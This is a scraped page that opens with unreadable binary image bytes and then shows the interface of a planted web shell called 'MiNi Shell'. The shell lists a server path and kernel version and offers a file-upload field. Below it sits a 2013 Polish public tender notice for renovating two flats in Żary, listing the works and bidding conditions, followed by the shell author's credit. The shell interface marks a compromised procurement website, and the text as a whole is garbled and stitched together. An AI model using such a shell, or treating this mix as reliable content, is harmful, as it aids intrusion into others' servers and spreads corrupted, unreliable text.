JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131008/407510-N-2013.html

<p class="kh_header"><b>Żary: Remont wolnych lokali mieszkalnych: ul. Powstańców Wielkopolskich
                14 b/1 i ul. Powstańców Wielkopolskich 18 a/9 w Żarach.</b><br>
<b>Numer ogłoszenia: 407510 - 2013; data zamieszczenia: 08.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej sp. z o.o. , ul. Zakopiańska 7, 68-200 Żary, woj. lubuskie, tel. 068 4791469, faks 068 4539004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgmzary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wolnych lokali mieszkalnych: ul. Powstańców Wielkopolskich
                14 b/1 i ul. Powstańców Wielkopolskich 18 a/9 w Żarach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Powstańców
      Wielkopolskich 14b/1


L.p.	Opis remontu	J/m	Ilość
1.	wymiana osprzętu elek. w lok. + pomiary	lok.	1
2.	wymiana kuchni węglowej przenośnej z wężownicą	szt.	1
3.	przestawienie pieca licowanego kaflami - oczyszczenie kafli z farby /	
szt. 	
1
4.	opina kominiarska dot. prawidłowości podłączenia	szt.	1
5.	wymiana drzwiczek wyciorowych 	szt.	2
6.	wymiana szafki pod zlewozmywak, baterii szt. 3 / umywalkowa, wannowa, zlewozmywakowa /	
kpl.	
1
7.	wymiana wc / płuczka + muszla / i osprzęt 	kpl.	1
8.	sprawdzenie podgrzewacza wody w łazience	szt.	1
9.	usunięcie nieszczelności na inst. wodnej / wymiana /	kpl.	1
10.	naprawa i dopasowanie stolarki okiennej zesp.	lok.	1
11.	szpachlowanie i malowanie ścian i sufitów farbami emulsyjnymi w kolorach jasnych / oraz pom. gosp /	
lok.	
1
12.	malowanie farbami olejnymi ścian / w obrębie zlewozmywaka i trzonu /	
pom.	
1
 13.	malowanie farbami olejnymi stolarki drzwiowej 	lok.	1
 14.	skasowanie zacieków z szpachlowaniem ściany 	m2	ok. 3
 15.	wymiana zamka z szyldami w drzwiach do pom. gosp.	kpl.	1
 16.	wymiana kratek wentylacyjnych 	szt. 	3
 17.	montaż paneli podłogowych w pokoju i p. pokoju	pom.	2
 18.	montaż listwy met. w łączeniu z płytkami cer. 	szt.	1


2.	Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Powstańców
      Wielkopolskich 18a/9

L.p.	Opis remontu	J/m	Ilość
1.	wymiana osprzętu elek. w lok. + pomiary	lok.	1
2.	wymiana kuchni węglowej przenośnej z wężownicą	szt.	1
3.	przestawienie pieca licowanego / 1 szt. w ścianie /	szt. 	2
4.	opina kominiarska dot. prawidłowości podłączenia	szt.	1
5.	wymiana kratek wentylacyjnych 	szt.	2
6.	wymiana szafki pod zlewozmywak	kpl.	1
7.	wymiana inst. wodnej 	kpl.	1
8.	sprawdzenie podgrzewacza wody w łazience
wymiana wc + wymiana wykładziny	szt
kpl..	1
1
9.	naprawa i dopasowanie stolarki okiennej zesp. 	lok.	1
10.	szpachlowanie i malowanie ścian i sufitów farbami emulsyjnymi w kolorach jasnych / oraz pom. gosp /
/ zerwanie tapet /	

lok.	

1

11.	malowanie farbami olejnymi ścian / w obrębie zlewozmywaka i trzonu /	
pom.	
1
 12.	malowanie farbami olejnymi stolarki drzwiowej / wraz z uzup. osprzętu / i okiennej	
lok.	
1
 13.	wymiana szyby w drzwiach wew.	szt.	1
 14.	montaż paneli podłogowych 	lok.	1
 15.	wykonanie częściowej obudowy wanny  	szt.	1
 16.	naprawa skrzydła drzwiowego do pom. gosp. / w okolicy zawiasów / + malowanie 	
szt.	
1
 17.	regulacja i uzupełnienie rynien	bud.	
 18.	naprawa wejścia do lokalu z kostki polbruk / miejscowe przełożenie	
m2	
2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.35.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy -dotyczy/nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy -dotyczy/nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy -dotyczy/nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy -dotyczy/nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy -dotyczy/nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5.1	ZMIANY OGÓLNE
Możliwa jest:
a) zmiana adresu/siedziby Zamawiającego/Wykonawcy;
b) zmiana osób występujących po stronie Zamawiającego/Wykonawcy.
5.2	ZMIANY RZUTUJĄCE NA  TERMIN 
1.2.1. Możliwa jest zmiana terminu wykonania umowy, ewentualnie wstrzymanie/wznowienie robót, ze względu na:
a) uzasadnione zmiany w zakresie sposobu wykonania przedmiotu zamówienia proponowane przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
b) konieczność oczekiwania Wykonawcy na dostawę zamówionej stolarki okiennej pod warunkiem zamówienia jej w ciągu pierwszych 3 dni roboczych od podpisania umowy oraz niezwłocznym poinformowaniu Zamawiającego o możliwym terminie odbioru stolarki okiennej wykraczającym poza termin realizacji umowy. Zamawiający ma prawo weryfikacji terminów wykonania stolarki okiennej u innych producentów oraz w uzasadnionym przypadku odmowy wydłużenia terminu.
c) przedłużenie procedury przetargowej;
d) uwarunkowania społeczne (protesty, listy, petycje, itp.);
e) konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami
nieruchomości;
f) technologię wykonywania robót;
g) zmiany stanu prawnego;
h) działania sił natury, 
i) działania osób trzecich uniemożliwiające wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
1.2.2. Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.
 2. ZMIANY RZUTUJĄCE NA WYNAGRODZENIE
     Możliwa jest zmiana postanowień umowy w związku ze zmianą stawki podatku od towarów i usług (VAT)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgmzary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 68-200 Żary ul. Zakopiańska 7 pokój nr 7  DZIAŁ TECHNICZNY.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2013 godzina 10:00, miejsce: 68-200 Żary ul. Zakopiańska 7, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Powstańców
      Wielkopolskich 14b/1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis remontu	J/m	Ilość
1.	wymiana osprzętu elek. w lok. + pomiary	lok.	1
2.	wymiana kuchni węglowej przenośnej z wężownicą	szt.	1
3.	przestawienie pieca licowanego kaflami - oczyszczenie kafli z farby /	
szt. 	
1
4.	opina kominiarska dot. prawidłowości podłączenia	szt.	1
5.	wymiana drzwiczek wyciorowych 	szt.	2
6.	wymiana szafki pod zlewozmywak, baterii szt. 3 / umywalkowa, wannowa, zlewozmywakowa /	
kpl.	
1
7.	wymiana wc / płuczka + muszla / i osprzęt 	kpl.	1
8.	sprawdzenie podgrzewacza wody w łazience	szt.	1
9.	usunięcie nieszczelności na inst. wodnej / wymiana /	kpl.	1
10.	naprawa i dopasowanie stolarki okiennej zesp.	lok.	1
11.	szpachlowanie i malowanie ścian i sufitów farbami emulsyjnymi w kolorach jasnych / oraz pom. gosp /	
lok.	
1
12.	malowanie farbami olejnymi ścian / w obrębie zlewozmywaka i trzonu /	
pom.	
1
 13.	malowanie farbami olejnymi stolarki drzwiowej 	lok.	1
 14.	skasowanie zacieków z szpachlowaniem ściany 	m2	ok. 3
 15.	wymiana zamka z szyldami w drzwiach do pom. gosp.	kpl.	1
 16.	wymiana kratek wentylacyjnych 	szt. 	3
 17.	montaż paneli podłogowych w pokoju i p. pokoju	pom.	2
 18.	montaż listwy met. w łączeniu z płytkami cer. 	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.35.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.	Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Powstańców
      Wielkopolskich 18a/9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis remontu	J/m	Ilość
1.	wymiana osprzętu elek. w lok. + pomiary	lok.	1
2.	wymiana kuchni węglowej przenośnej z wężownicą	szt.	1
3.	przestawienie pieca licowanego / 1 szt. w ścianie /	szt. 	2
4.	opina kominiarska dot. prawidłowości podłączenia	szt.	1
5.	wymiana kratek wentylacyjnych 	szt.	2
6.	wymiana szafki pod zlewozmywak	kpl.	1
7.	wymiana inst. wodnej 	kpl.	1
8.	sprawdzenie podgrzewacza wody w łazience
wymiana wc + wymiana wykładziny	szt
kpl..	1
1
9.	naprawa i dopasowanie stolarki okiennej zesp. 	lok.	1
10.	szpachlowanie i malowanie ścian i sufitów farbami emulsyjnymi w kolorach jasnych / oraz pom. gosp /
/ zerwanie tapet /	

lok.	

1

11.	malowanie farbami olejnymi ścian / w obrębie zlewozmywaka i trzonu /	
pom.	
1
 12.	malowanie farbami olejnymi stolarki drzwiowej / wraz z uzup. osprzętu / i okiennej	
lok.	
1
 13.	wymiana szyby w drzwiach wew.	szt.	1
 14.	montaż paneli podłogowych 	lok.	1
 15.	wykonanie częściowej obudowy wanny  	szt.	1
 16.	naprawa skrzydła drzwiowego do pom. gosp. / w okolicy zawiasów / + malowanie 	
szt.	
1
 17.	regulacja i uzupełnienie rynien	bud.	
 18.	naprawa wejścia do lokalu z kostki polbruk / miejscowe przełożenie	
m2	
2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.35.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com